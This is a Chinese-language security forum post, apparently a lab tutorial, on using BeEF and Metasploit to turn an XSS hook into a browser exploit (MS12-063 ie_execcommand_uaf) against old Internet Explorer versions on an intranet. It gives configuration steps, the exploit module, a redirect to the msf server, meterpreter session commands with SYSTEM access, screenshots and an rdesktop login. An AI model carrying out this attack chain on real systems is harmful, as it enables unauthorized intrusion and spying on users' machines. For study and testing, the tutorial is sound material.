马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?立即注册
x
metasploit利用IE漏洞XSS挂马拿内网主机metasploit内网渗透方面好多方式,这只是科普下xss在内网中的利用。 系统:KALI
用到的工具:beEF+msf 利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf MS12-063- Automatic
- IE 7 on Windows XP SP3
- IE 8 on Windows XP SP3
- IE 7 on Windows Vista
- IE 8 on Windows Vista
- IE 8 on Windows 7
- IE 9 on Windows 7
复制代码 用到的beef+msf
先配置下:- root@kali:~# cd /usr/share/beef-xss/
- root@kali:/usr/share/beef-xss# ls
- beef beef_key.pem config.yaml db Gemfile modules
- beef_cert.pem bundle core extensions Gemfile.lock
复制代码 编辑下config.yaml
把metasploit :false改成true
再进入extensions/metasploit/
同样修改下config.yaml
把host跟callback_host 改成自己的IP 这里是220.128
再改动下custom path:
这样beef已经配置好了。那就运行下metasploit
运行msf后 数据库连接下,不然上线也会没有提示的。这里的pass 就是extensions/metasploit/config.yaml里面的pass
这样就没有什么问题。我们可以先看一下beef.数据库只要连上了就不会出现msf的api错误的。
进入beef
账号密码beef 配置文件里面有。beef:beef
那beef已经都OK了。
现在来搞下选择下要显示的页面:
hook.js 运行beef 显示出来的。
别忘记运行下apache。
我们再进入msf
- use exploit/windows/browser/ie_execcommand_uaf
复制代码 可以自己根据自己的要求来选择。
port可以自已改。
我用xp+ie7
直接访问下我们的页面192.168.220.128/xss/
beef就会显示出来了。
点击 commands-hookeddomain-REDIRECT BROWSER 让他重新跳转到我们msf生成的地址上。beef很多功能。
把地址改成192.168.220.128:8080(msf生成的地址)
我们就会看到msf上面已经显示出来了。 回显了sessions
payload可以自己去改。我使用的meterpreter载荷
执行sessions -i
执行sessions -i ID号
可以执行任意命令已经是系统权限
执行下screenshost
- meterpreter > screenshot
- Screenshot saved to: /root/dlsSQBkF.jpeg
复制代码 就可以看到当前主机的屏幕内容。
也可以rdesktop 远程连接上去。
参数rdesktop -f ip -u username -p password
这也是一种xss挂马拿内网主机。
|